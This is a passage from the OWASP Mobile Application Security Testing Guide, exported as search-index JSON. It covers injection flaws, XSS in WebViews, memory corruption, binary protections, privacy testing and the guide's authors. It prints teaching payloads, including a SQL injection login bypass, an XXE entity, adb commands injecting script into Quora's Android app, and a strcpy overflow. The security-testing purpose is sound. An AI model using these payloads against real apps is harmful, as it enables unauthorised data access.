"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#sql-injection","title":"SQL Injection","text":"A SQL injection attack involves integrating SQL commands into input data, mimicking the syntax of a predefined SQL command. A successful SQL injection attack allows the attacker to read or write to the database and possibly execute administrative commands, depending on the permissions granted by the server.
Apps on both Android and iOS use SQLite databases as a means to control and organize local data storage. Assume an Android app handles local user authentication by storing the user credentials in a local database (a poor programming practice we\u2019ll overlook for the sake of this example). Upon login, the app queries the database to search for a record with the username and password entered by the user:
SQLiteDatabase db;\n\nString sql = \"SELECT * FROM users WHERE username = '\" + username + \"' AND password = '\" + password +\"'\";\n\nCursor c = db.rawQuery( sql, null );\n\nreturn c.getCount() != 0;\n
Let's further assume an attacker enters the following values into the \"username\" and \"password\" fields:
username = 1' or '1' = '1\npassword = 1' or '1' = '1\n
This results in the following query:
SELECT * FROM users WHERE username='1' OR '1' = '1' AND Password='1' OR '1' = '1'\n
Because the condition '1' = '1'
always evaluates as true, this query return all records in the database, causing the login function to return true
even though no valid user account was entered.
Ostorlab exploited the sort parameter of Yahoo's weather mobile application with adb using this SQL injection payload.
Another real-world instance of client-side SQL injection was discovered by Mark Woods within the \"Qnotes\" and \"Qget\" Android apps running on QNAP NAS storage appliances. These apps exported content providers vulnerable to SQL injection, allowing an attacker to retrieve the credentials for the NAS device. A detailed description of this issue can be found on the Nettitude Blog.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#xml-injection","title":"XML Injection","text":"In a XML injection attack, the attacker injects XML meta-characters to structurally alter XML content. This can be used to either compromise the logic of an XML-based application or service, as well as possibly allow an attacker to exploit the operation of the XML parser processing the content.
A popular variant of this attack is XML eXternal Entity (XXE). Here, an attacker injects an external entity definition containing an URI into the input XML. During parsing, the XML parser expands the attacker-defined entity by accessing the resource specified by the URI. The integrity of the parsing application ultimately determines capabilities afforded to the attacker, where the malicious user could do any (or all) of the following: access local files, trigger HTTP requests to arbitrary hosts and ports, launch a cross-site request forgery (CSRF) attack, and cause a denial-of-service condition. The OWASP web testing guide contains the following example for XXE:
<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n <!DOCTYPE foo [ \n <!ELEMENT foo ANY >\n <!ENTITY xxe SYSTEM \"file:///dev/random\" >]><foo>&xxe;</foo>\n
In this example, the local file /dev/random
is opened where an endless stream of bytes is returned, potentially causing a denial-of-service.
The current trend in app development focuses mostly on REST/JSON-based services as XML is becoming less common. However, in the rare cases where user-supplied or otherwise untrusted content is used to construct XML queries, it could be interpreted by local XML parsers, such as NSXMLParser on iOS. As such, said input should always be validated and meta-characters should be escaped.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#injection-attack-vectors","title":"Injection Attack Vectors","text":"The attack surface of mobile apps is quite different from typical web and network applications. Mobile apps don't often expose services on the network, and viable attack vectors on an app's user interface are rare. Injection attacks against an app are most likely to occur through inter-process communication (IPC) interfaces, where a malicious app attacks another app running on the device.
Locating a potential vulnerability begins by either:
During a manual security review, you should employ a combination of both techniques. In general, untrusted inputs enter mobile apps through the following channels:
Verify that the following best practices have been followed:
We will cover details related to input sources and potentially vulnerable APIs for each mobile OS in the OS-specific testing guides.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#cross-site-scripting-flaws","title":"Cross-Site Scripting Flaws","text":"Cross-site scripting (XSS) issues allow attackers to inject client-side scripts into web pages viewed by users. This type of vulnerability is prevalent in web applications. When a user views the injected script in a browser, the attacker gains the ability to bypass the same origin policy, enabling a wide variety of exploits (e.g. stealing session cookies, logging key presses, performing arbitrary actions, etc.).
In the context of native apps, XSS risks are far less prevalent for the simple reason these kinds of applications do not rely on a web browser. However, apps using WebView components, such as WKWebView
or the deprecated UIWebView
on iOS and WebView
on Android, are potentially vulnerable to such attacks.
An older but well-known example is the local XSS issue in the Skype app for iOS, first identified by Phil Purviance. The Skype app failed to properly encode the name of the message sender, allowing an attacker to inject malicious JavaScript to be executed when a user views the message. In his proof-of-concept, Phil showed how to exploit the issue and steal a user's address book.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#static-analysis-security-testing-considerations","title":"Static Analysis - Security Testing Considerations","text":"Take a close look at any WebViews present and investigate for untrusted input rendered by the app.
XSS issues may exist if the URL opened by WebView is partially determined by user input. The following example is from an XSS issue in the Zoho Web Service, reported by Linus S\u00e4rud.
Java
webView.loadUrl(\"javascript:initialize(\" + myNumber + \");\");\n
Kotlin
webView.loadUrl(\"javascript:initialize($myNumber);\")\n
Another example of XSS issues determined by user input is public overridden methods.
Java
@Override\npublic boolean shouldOverrideUrlLoading(WebView view, String url) {\n if (url.substring(0,6).equalsIgnoreCase(\"yourscheme:\")) {\n // parse the URL object and execute functions\n }\n}\n
Kotlin
fun shouldOverrideUrlLoading(view: WebView, url: String): Boolean {\n if (url.substring(0, 6).equals(\"yourscheme:\", ignoreCase = true)) {\n // parse the URL object and execute functions\n }\n }\n
Sergey Bobrov was able to take advantage of this in the following HackerOne report. Any input to the HTML parameter would be trusted in Quora's ActionBarContentActivity. Payloads were successful using adb, clipboard data via ModalContentActivity, and Intents from 3rd party applications.
$ adb shell\n$ am start -n com.quora.android/com.quora.android.ActionBarContentActivity \\\n-e url 'http://test/test' -e html 'XSS<script>alert(123)</script>'\n
$ am start -n com.quora.android/com.quora.android.ModalContentActivity \\\n-e url 'http://test/test' -e html \\\n'<script>alert(QuoraAndroid.getClipboardData());</script>'\n
Intent i = new Intent();\ni.setComponent(new ComponentName(\"com.quora.android\",\n\"com.quora.android.ActionBarContentActivity\"));\ni.putExtra(\"url\",\"http://test/test\");\ni.putExtra(\"html\",\"XSS PoC <script>alert(123)</script>\");\nview.getContext().startActivity(i);\n
val i = Intent()\ni.component = ComponentName(\"com.quora.android\",\n\"com.quora.android.ActionBarContentActivity\")\ni.putExtra(\"url\", \"http://test/test\")\ni.putExtra(\"html\", \"XSS PoC <script>alert(123)</script>\")\nview.context.startActivity(i)\n
If a WebView is used to display a remote website, the burden of escaping HTML shifts to the server side. If an XSS flaw exists on the web server, this can be used to execute script in the context of the WebView. As such, it is important to perform static analysis of the web application source code.
Verify that the following best practices have been followed:
Consider how data will be rendered in a response. For example, if data is rendered in a HTML context, six control characters that must be escaped:
Character Escaped & & < < > > \" " ' ' / /For a comprehensive list of escaping rules and other prevention measures, refer to the OWASP XSS Prevention Cheat Sheet.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#dynamic-analysis-security-testing-considerations","title":"Dynamic Analysis - Security Testing Considerations","text":"XSS issues can be best detected using manual and/or automated input fuzzing, i.e. injecting HTML tags and special characters into all available input fields to verify the web application denies invalid inputs or escapes the HTML meta-characters in its output.
A reflected XSS attack refers to an exploit where malicious code is injected via a malicious link. To test for these attacks, automated input fuzzing is considered to be an effective method. For example, the BURP Scanner is highly effective in identifying reflected XSS vulnerabilities. As always with automated analysis, ensure all input vectors are covered with a manual review of testing parameters.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#memory-corruption-bugs","title":"Memory Corruption Bugs","text":"Memory corruption bugs are a popular mainstay with hackers. This class of bug results from a programming error that causes the program to access an unintended memory location. Under the right conditions, attackers can capitalize on this behavior to hijack the execution flow of the vulnerable program and execute arbitrary code. This kind of vulnerability occurs in a number of ways:
Buffer overflows: This describes a programming error where an app writes beyond an allocated memory range for a particular operation. An attacker can use this flaw to overwrite important control data located in adjacent memory, such as function pointers. Buffer overflows were formerly the most common type of memory corruption flaw, but have become less prevalent over the years due to a number of factors. Notably, awareness among developers of the risks in using unsafe C library functions is now a common best practice plus, catching buffer overflow bugs is relatively simple. However, it is still worth testing for such defects.
Out-of-bounds-access: Buggy pointer arithmetic may cause a pointer or index to reference a position beyond the bounds of the intended memory structure (e.g. buffer or list). When an app attempts to write to an out-of-bounds address, a crash or unintended behavior occurs. If the attacker can control the target offset and manipulate the content written to some extent, code execution exploit is likely possible.
Dangling pointers: These occur when an object with an incoming reference to a memory location is deleted or deallocated, but the object pointer is not reset. If the program later uses the dangling pointer to call a virtual function of the already deallocated object, it is possible to hijack execution by overwriting the original vtable pointer. Alternatively, it is possible to read or write object variables or other memory structures referenced by a dangling pointer.
Use-after-free: This refers to a special case of dangling pointers referencing released (deallocated) memory. After a memory address is cleared, all pointers referencing the location become invalid, causing the memory manager to return the address to a pool of available memory. When this memory location is eventually re-allocated, accessing the original pointer will read or write the data contained in the newly allocated memory. This usually leads to data corruption and undefined behavior, but crafty attackers can set up the appropriate memory locations to leverage control of the instruction pointer.
Integer overflows: When the result of an arithmetic operation exceeds the maximum value for the integer type defined by the programmer, this results in the value \"wrapping around\" the maximum integer value, inevitably resulting in a small value being stored. Conversely, when the result of an arithmetic operation is smaller than the minimum value of the integer type, an integer underflow occurs where the result is larger than expected. Whether a particular integer overflow/underflow bug is exploitable depends on how the integer is used. For example, if the integer type were to represent the length of a buffer, this could create a buffer overflow vulnerability.
Format string vulnerabilities: When unchecked user input is passed to the format string parameter of the printf
family of C functions, attackers may inject format tokens such as \u2018%c\u2019 and \u2018%n\u2019 to access memory. Format string bugs are convenient to exploit due to their flexibility. Should a program output the result of the string formatting operation, the attacker can read and write to memory arbitrarily, thus bypassing protection features such as ASLR.
The primary goal in exploiting memory corruption is usually to redirect program flow into a location where the attacker has placed assembled machine instructions referred to as shellcode. On iOS, the data execution prevention feature (as the name implies) prevents execution from memory defined as data segments. To bypass this protection, attackers leverage return-oriented programming (ROP). This process involves chaining together small, pre-existing code chunks (\"gadgets\") in the text segment where these gadgets may execute a function useful to the attacker or, call mprotect
to change memory protection settings for the location where the attacker stored the shellcode.
Android apps are, for the most part, implemented in Java which is inherently safe from memory corruption issues by design. However, native apps utilizing JNI libraries are susceptible to this kind of bug. In rare cases, Android apps that use XML/JSON parsers to unwrap Java objects are also subject to memory corruption bugs. An example of such vulnerability was found in the PayPal app.
Similarly, iOS apps can wrap C/C++ calls in Obj-C or Swift, making them susceptible to these kind of attacks.
Example:
The following code snippet shows a simple example for a condition resulting in a buffer overflow vulnerability.
void copyData(char *userId) { \n char smallBuffer[10]; // size of 10 \n strcpy(smallBuffer, userId);\n } \n
To identify potential buffer overflows, look for uses of unsafe string functions (strcpy
, strcat
, other functions beginning with the \"str\" prefix, etc.) and potentially vulnerable programming constructs, such as copying user input into a limited-size buffer. The following should be considered red flags for unsafe string functions:
strcat
strcpy
strncat
strlcat
strncpy
strlcpy
sprintf
snprintf
gets
Also, look for instances of copy operations implemented as \"for\" or \"while\" loops and verify length checks are performed correctly.
Verify that the following best practices have been followed:
strcpy
, most other functions beginning with the \"str\" prefix, sprint
, vsprintf
, gets
, etc.;memcpy
, make sure you check that the target buffer is at least of equal size as the source and that both buffers are not overlapping.Static code analysis of low-level code is a complex topic that could easily fill its own book. Automated tools such as RATS combined with limited manual inspection efforts are usually sufficient to identify low-hanging fruits. However, memory corruption conditions often stem from complex causes. For example, a use-after-free bug may actually be the result of an intricate, counter-intuitive race condition not immediately apparent. Bugs manifesting from deep instances of overlooked code deficiencies are generally discovered through dynamic analysis or by testers who invest time to gain a deep understanding of the program.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#dynamic-analysis-security-testing-considerations_1","title":"Dynamic Analysis Security Testing Considerations","text":"Memory corruption bugs are best discovered via input fuzzing: an automated black-box software testing technique in which malformed data is continually sent to an app to survey for potential vulnerability conditions. During this process, the application is monitored for malfunctions and crashes. Should a crash occur, the hope (at least for security testers) is that the conditions creating the crash reveal an exploitable security flaw.
Fuzz testing techniques or scripts (often called \"fuzzers\") will typically generate multiple instances of structured input in a semi-correct fashion. Essentially, the values or arguments generated are at least partially accepted by the target application, yet also contain invalid elements, potentially triggering input processing flaws and unexpected program behaviors. A good fuzzer exposes a substantial amount of possible program execution paths (i.e. high coverage output). Inputs are either generated from scratch (\"generation-based\") or derived from mutating known, valid input data (\"mutation-based\").
For more information on fuzzing, refer to the OWASP Fuzzing Guide.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#binary-protection-mechanisms","title":"Binary Protection Mechanisms","text":""},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#position-independent-code","title":"Position Independent Code","text":"PIC (Position Independent Code) is code that, being placed somewhere in the primary memory, executes properly regardless of its absolute address. PIC is commonly used for shared libraries, so that the same library code can be loaded in a location in each program address space where it does not overlap with other memory in use (for example, other shared libraries).
PIE (Position Independent Executable) are executable binaries made entirely from PIC. PIE binaries are used to enable ASLR (Address Space Layout Randomization) which randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#memory-management","title":"Memory Management","text":""},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#automatic-reference-counting","title":"Automatic Reference Counting","text":"ARC (Automatic Reference Counting) is a memory management feature of the Clang compiler exclusive to Objective-C and Swift. ARC automatically frees up the memory used by class instances when those instances are no longer needed. ARC differs from tracing garbage collection in that there is no background process that deallocates the objects asynchronously at runtime.
Unlike tracing garbage collection, ARC does not handle reference cycles automatically. This means that as long as there are \"strong\" references to an object, it will not be deallocated. Strong cross-references can accordingly create deadlocks and memory leaks. It is up to the developer to break cycles by using weak references. You can learn more about how it differs from Garbage Collection here.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#garbage-collection","title":"Garbage Collection","text":"Garbage Collection (GC) is an automatic memory management feature of some languages such as Java/Kotlin/Dart. The garbage collector attempts to reclaim memory which was allocated by the program, but is no longer referenced\u2014also called garbage. The Android runtime (ART) makes use of an improved version of GC. You can learn more about how it differs from ARC here.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#manual-memory-management","title":"Manual Memory Management","text":"Manual memory management is typically required in native libraries written in C/C++ where ARC and GC do not apply. The developer is responsible for doing proper memory management. Manual memory management is known to enable several major classes of bugs into a program when used incorrectly, notably violations of memory safety or memory leaks.
More information can be found in \"Memory Corruption Bugs\".
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#stack-smashing-protection","title":"Stack Smashing Protection","text":"Stack canaries help prevent stack buffer overflow attacks by storing a hidden integer value on the stack right before the return pointer. This value is then validated before the return statement of the function is executed. A buffer overflow attack often overwrites a region of memory in order to overwrite the return pointer and take over the program flow. If stack canaries are enabled, they will be overwritten as well and the CPU will know that the memory has been tampered with.
Stack buffer overflow is a type of the more general programming vulnerability known as buffer overflow (or buffer overrun). Overfilling a buffer on the stack is more likely to derail program execution than overfilling a buffer on the heap because the stack contains the return addresses for all active function calls.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/","title":"Mobile App User Privacy Protection","text":""},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#overview","title":"Overview","text":"IMPORTANT DISCLAIMER: The MASTG is not a legal handbook and it will not go into the specifics of the GDPR or other possibly relevant legislation here. Instead, this chapter will introduce you to the topics related to user privacy protection, provide you with essential references for your own research efforts, and give you tests or guidelines that determine whether an app adheres to the privacy-related requirements listed in the OWASP MASVS.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#the-main-problem","title":"The Main Problem","text":"Mobile apps handle all kinds of sensitive user data, from identification and banking information to health data, so both the developers and the public are understandably concerned about how this data is handled and where it ends up. It is also worth discussing the \"benefits users get from using the apps\" vs \"the real price that they are paying for it\" (often without even being aware of it).
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#the-solution-pre-2020","title":"The Solution (pre-2020)","text":"To ensure that users are properly protected, legislation such as the European Union's General Data Protection Regulation (GDPR) in Europe have been developed and deployed (applicable since May 25, 2018). These laws can force developers to be more transparent regarding the handling of sensitive user data, which is usually implemented with privacy policies.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#the-challenge","title":"The Challenge","text":"Consider these dimensions of mobile app privacy:
Note: More often than not apps will claim to handle certain data, but in reality that's not the case. The IEEE article \"Engineering Privacy in Smartphone Apps: A Technical Guideline Catalog for App Developers\" by Majid Hatamian gives a very nice introduction to this topic.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#goals-for-data-protection","title":"Goals for Data Protection","text":"When an app requests personal information from a user, the user needs to know why the app needs that data and how it is used by the app. If there is a third party doing the actual processing of the data, the app should tell the user that too.
Like the classic triad of security protection goals: confidentiality, integrity, and availability, there are three protection goals that have been proposed for data protection:
For more details, see Section 5.1.1 \"Introduction to data protection goals\" in ENISA's \"Privacy and data protection in mobile applications\".
Since it is very challenging (if not impossible in many cases) to address both security and privacy protection goals at the same time, it is worth examining an visualization in IEEE's publication Protection Goals for Privacy Engineering called \"The Three Axes\" which helps us understand why we cannot reach 100% of each of all six goals simultaneously.
Though a privacy policy traditionally protects most of the these processes, that approach is not always optimal because:
In order to address these challenges and better inform users, Google and Apple have introduced new privacy labeling systems (very much along the lines of NIST's proposal) to help users easily understand how their data is being collected, handled, and shared, Consumer Software Cybersecurity Labeling. Their approaches can be seen at:
Since this is a new requirement on both platforms, these labels must be accurate in order to reassure users and mitigate abuse.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#google-ada-masa-program","title":"Google ADA MASA Program","text":"Since regular security testing helps developers identify key vulnerabilities in their apps, Google Play will allow developers who have completed independent security validation to inform users by disclosing this fact in the app's Data Safety section. The developer's commitment to security and privacy is meant to reassure users.
As part of the process to provide more transparency into the app's security architecture, Google has introduced the MASA (Mobile Application Security Assessment) program as part of the App Defense Alliance (ADA). Since MASA is a globally recognized standard for mobile app security to the mobile app ecosystem, Google is acknowledging the importance of security in this industry. Developers can work directly with an Authorized Lab partner to initiate a security assessment that is independently validated against a set of MASVS Level 1 requirements, and Google will recognize this effort by allowing them to disclose these tests in the app's Data Safety section.
If you are a developer and would like to participate, complete the Independent Security Review form.
Of course the testing is limited and it does not guarantee complete safety of the application. The independent review may not be scoped to verify the accuracy and completeness of a developer's Data Safety declarations, and developers remain solely responsible for making complete and accurate declarations in their app's Play Store listing.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#references","title":"References","text":"You can learn more about this and other privacy related topics here:
Security testers should be aware of Google Play's list of common privacy violations though it is not exhaustive. Some of the examples are below:
You can find more common violations in Google Play Console Help by going to Policy Centre -> Privacy, deception and device abuse -> User data.
As you might expect, these testing categories are related to each other. When you're testing them you're often indirectly testing for user privacy protection. This fact will allow you to help you provide better and more comprehensive reports. Often you'll be able to reuse evidence from other tests in order to test for User Privacy Protection).
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#testing-disclosure-of-data-privacy-on-the-app-marketplace","title":"Testing Disclosure of Data Privacy on the App Marketplace","text":"This document is only interested in determining which privacy-related information is being disclosed by the developers and discussing how to evaluate this information to decide if it seems reasonable (similarly as you'd do when testing for permissions).
While it is possible that the developers are not declaring certain information that is indeed being collected and\\/or shared, that is a topic for a different test. In this test, you are not supposed to provide privacy violation assurance.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#static-analysis","title":"Static Analysis","text":"To perform a static analysis, follow these steps:
The app passes the test as long as the developer has complied with the app marketplace guidelines and included the required labels and explanations. The developer's disclosures in the app marketpace should be stored as evidence, so that you can later use it to determine potential violations of privacy or data protection.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#dynamic-analysis","title":"Dynamic Analysis","text":"As an optional step, you can also provide some kind of evidence as part of this test. For instance, if you're testing an iOS app you can easily enable app activity recording and export a Privacy Report that contains detailed app access to different resources such as photos, contacts, camera, microphone, network connections, etc.
A dynamic analysis has many advantages for testing other MASVS categories and it provides very useful information that you can use to test network communication for MASVS-NETWORK or when testing app interaction with the platform for MASVS-PLATFORM. While testing these other categories, you might have taken similar measurements using other testing tools. You can also provide this as evidence for this test.
Though the information available should be compared against what the app is actually meant to do, this will be far from a trivial task that could take from several days to weeks to finish depending on your resources and the capabilities of your automated tools. These tests also heavily depends on the app functionality and context and should be ideally performed on a white box setup working very closely with the app developers.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#testing-user-education-on-security-best-practices","title":"Testing User Education on Security Best Practices","text":"Determining whether the app educates users and helps them understand security needs is especially challenging if you intend to automate the process. We recommend using the app extensively and try to answer the following questions whenever applicable:
Fingerprint usage: When fingerprints are used for authentication providing access to high-risk transactions/information,
does the app inform the user about potential issues when having multiple fingerprints of other people registered to the device as well?
Rooting/jailbreaking: When root or jailbreak detection is implemented,
does the app inform the user of the fact that certain high-risk actions will carry additional risk due to the jailbroken/rooted status of the device?
Specific credentials: When a user gets a recovery code, a password, or a pin from the application (or sets one),
does the app instruct the user to never share this with anyone else and that only the app will request it?
Application distribution: In case of a high-risk application and in order to prevent users from downloading compromised versions of the application,
does the app manufacturer properly communicate the official way of distributing the app (e.g. from Google Play or the App Store)?
Prominent Disclosure: In any case,
does the app display prominent disclosure of data access, collection, use, and sharing? e.g. does the app use the App Tracking Transparency Framework to ask for the permission on iOS?
Other references include:
Welcome to the OWASP Mobile Application Security Testing Guide. Feel free to explore the existing content, but do note that it may change at any time. New APIs and best practices are introduced in iOS and Android with every major (and minor) release and also vulnerabilities are found every day.
If you have feedback or suggestions, or want to contribute, create an issue on GitHub or ping us on Slack. See the README for instructions:
https://www.github.com/OWASP/owasp-mastg/
squirrel (noun plural): Any arboreal sciurine rodent of the genus Sciurus, such as S. vulgaris (red squirrel) or S. carolinensis (grey squirrel), having a bushy tail and feeding on nuts, seeds, etc.
On a beautiful summer day, a group of ~7 young men, a woman, and approximately three squirrels met in a Woburn Forest villa during the OWASP Security Summit 2017. So far, nothing unusual. But little did you know, within the next five days, they would redefine not only mobile application security, but the very fundamentals of book writing itself (ironically, the event took place near Bletchley Park, once the residence and work place of the great Alan Turing).
Or maybe that's going too far. But at least, they produced a proof-of-concept for an unusual security book. The Mobile Application Security Testing Guide (MASTG) is an open, agile, crowd-sourced effort, made of the contributions of dozens of authors and reviewers from all over the world.
Because this isn't a normal security book, the introduction doesn't list impressive facts and data proving importance of mobile devices in this day and age. It also doesn't explain how mobile application security is broken, and why a book like this was sorely needed, and the authors don't thank their beloved ones without whom the book wouldn't have been possible.
We do have a message to our readers however! The first rule of the OWASP Mobile Application Security Testing Guide is: Don't just follow the OWASP Mobile Application Security Testing Guide. True excellence at mobile application security requires a deep understanding of mobile operating systems, coding, network security, cryptography, and a whole lot of other things, many of which we can only touch on briefly in this book. Don't stop at security testing. Write your own apps, compile your own kernels, dissect mobile malware, learn how things tick. And as you keep learning new things, consider contributing to the MASTG yourself! Or, as they say: \"Do a pull request\".
"},{"location":"MASTG/Intro/0x02a-Frontispiece/","title":"Frontispiece","text":""},{"location":"MASTG/Intro/0x02a-Frontispiece/#about-the-owasp-mastg","title":"About the OWASP MASTG","text":"The OWASP Mobile Application Security Testing Guide (MASTG), which is part of the OWASP Mobile Application Security (MAS) flagship project, is a comprehensive manual covering the processes, techniques, and tools used during mobile application security analysis, as well as an exhaustive set of test cases for verifying the requirements listed in the OWASP Mobile Application Security Verification Standard (MASVS), providing a baseline for complete and consistent security tests.
The OWASP MASVS and MASTG are trusted by the following platform providers and standardization, governmental and educational institutions. Learn more.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#authors","title":"Authors","text":""},{"location":"MASTG/Intro/0x02a-Frontispiece/#bernhard-mueller","title":"Bernhard Mueller","text":"
Bernhard is a cyber security specialist with a talent for hacking systems of all kinds. During more than a decade in the industry, he has published many zero-day exploits for software such as MS SQL Server, Adobe Flash Player, IBM Director, Cisco VOIP, and ModSecurity. If you can name it, he has probably broken it at least once. BlackHat USA commended his pioneering work in mobile security with a Pwnie Award for Best Research.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#sven-schleier","title":"Sven Schleier","text":"Sven is an experienced web and mobile penetration tester and assessed everything from historic Flash applications to progressive mobile apps. He is also a security engineer that supported many projects end-to-end during the SDLC to \"build security in\". He was speaking at local and international meetups and conferences and is conducting hands-on workshops about web application and mobile app security.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#jeroen-willemsen","title":"Jeroen Willemsen","text":"Jeroen is a principal security architect with a passion for mobile security and risk management. He has supported companies as a security coach, a security engineer and as a full-stack developer, which makes him a jack of all trades. He loves explaining technical subjects: from security issues to programming challenges.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#carlos-holguera","title":"Carlos Holguera","text":"Carlos is a mobile security research engineer who has gained many years of hands-on experience in the field of security testing for mobile apps and embedded systems such as automotive control units and IoT devices. He is passionate about reverse engineering and dynamic instrumentation of mobile apps and is continuously learning and sharing his knowledge.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#co-authors","title":"Co-Authors","text":"Co-authors have consistently contributed quality content and have at least 2,000 additions logged in the GitHub repository.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#romuald-szkudlarek","title":"Romuald Szkudlarek","text":"Romuald is a passionate cyber security & privacy professional with over 15 years of experience in the web, mobile, IoT and cloud domains. During his career, he has been dedicating his spare time to a variety of projects with the goal of advancing the sectors of software and security. He is teaching regularly at various institutions. He holds CISSP, CCSP, CSSLP, and CEH credentials.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#jeroen-beckers","title":"Jeroen Beckers","text":"Jeroen is a mobile security lead responsible for quality assurance on mobile security projects and for R&D on all things mobile. Although he started his career as a programmer, he found that it was more fun to take things apart than to put things together, and the switch to security was quickly made. Ever since his master's thesis on Android security, Jeroen has been interested in mobile devices and their (in)security. He loves sharing his knowledge with other people, as is demonstrated by his many talks & trainings at colleges, universities, clients and conferences.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#vikas-gupta","title":"Vikas Gupta","text":"Vikas is an experienced cyber security researcher, with expertise in mobile security. In his career he has worked to secure applications for various industries including fintech, banks and governments. He enjoys reverse engineering, especially obfuscated native code and cryptography. He holds masters in security and mobile computing, and an OSCP certification. He is always open to share his knowledge and exchange ideas.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#changelog","title":"Changelog","text":"All our Changelogs are available online at the OWASP MASTG GitHub repository, see the Releases page:
https://github.com/OWASP/owasp-mastg/releases
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#disclaimer","title":"Disclaimer","text":"Please consult the laws in your country before executing any tests against mobile apps by utilizing the MASTG materials. Refrain from violating the laws with anything described in the MASTG.
Our [Code of Conduct] has further details: https://github.com/OWASP/owasp-mastg/blob/master/CODE_OF_CONDUCT.md
OWASP thanks the many authors, reviewers, and editors for their hard work in developing this guide. If you have any comments or suggestions, please connect with us: https://mas.owasp.org/contact
If you find any inconsistencies or typos please open an issue in the OWASP MASTG Github Repo: https://github.com/OWASP/owasp-mastg
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#copyright-and-license","title":"Copyright and License","text":"Copyright \u00a9 The OWASP Foundation. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License. For any reuse or distribution, you must make clear to others the license terms of this work.
"},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/","title":"OWASP MASVS and MASTG Adoption","text":"The OWASP MASVS and MASTG are trusted by the following platform providers and standardization, governmental and educational institutions.
"},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/#mobile-platform-providers","title":"Mobile Platform Providers","text":""},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/#google-android","title":"Google Android","text":"Since 2021 Google has shown their support for the OWASP Mobile Security project (MASTG/MASVS) and has started providing continuous and high value feedback to the MASVS refactoring process via the App Defense Alliance (ADA) and its MASA (Mobile Application Security Assessment) program.
With MASA, Google has acknowledged the importance of leveraging a globally recognized standard for mobile app security to the mobile app ecosystem. Developers can work directly with an Authorized Lab partner to initiate a security assessment. Google will recognize developers who have had their applications independently validated against a set of MASVS Level 1 requirements and will showcase this on their Data safety section.
We thank Google, the ADA and all its members for their support and for their excellent work on protecting the mobile app ecosystem.
"},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/#certification-institutions","title":"Certification Institutions","text":""},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/#crest","title":"CREST","text":"CREST is an international not-for-profit, membership body who quality assures its members and delivers professional certifications to the cyber security industry. CREST works with governments, regulators, academe, training partners, professional bodies and other stakeholders around the world.
In August 2022, CREST launched the OWASP Verification Standard (OVS) Programme. CREST OVS sets new standards for application security. Underpinned by OWASP's Application Security Verification Standard (ASVS) and Mobile Application Security Verification Standard (MASVS), CREST is leveraging the open-source community to build and maintain global standards to deliver a global web and mobile application security framework. This will provide assurance to the buying community that developers using CREST OVS accredited providers, always know that they are engaged with ethical and capable organisations with skilled and competent security testers by leveraging the OWASP ASVS and MASVS standards.
We thank CREST for their consulation regarding the OVS programme and its support to the open-source community to build and maintain global cyber security standards.
"},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/#standardization-institutions","title":"Standardization Institutions","text":""},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/#nist-national-institute-of-standards-and-technology-united-states","title":"NIST (National Institute of Standards and Technology, United States)","text":"The National Institute of Standards and Technology (NIST) was founded in 1901 and is now part of the U.S. Department of Commerce. NIST is one of the nation's oldest physical science laboratories. Congress established the agency to remove a major challenge to U.S. industrial competitiveness at the time \u2014 a second-rate measurement infrastructure that lagged behind the capabilities of the United Kingdom, Germany and other economic rivals.
BSI stands for \"Federal Office for Information Security\", it has the goal to promote IT security in Germany and is the central IT security service provider for the federal government.
The mission of the ioXt Alliance is to build confidence in Internet of Things products through multi-stakeholder, international, harmonized, and standardized security and privacy requirements, product compliance programs, and public transparency of those requirements and programs.
In 2021, ioXt has extended its security principles through the Mobile Application profile, so that app developers can ensure their products are built with, and maintain, high cybersecurity standards such as the OWASP MASVS and the VPN Trust Initiative. The ioXt Mobile Application profile is a security standard that applies to any cloud connected mobile app and provides the much needed market transparency for consumer and commercial mobile app security.
Would you like to contribute with your case study? Connect with us!
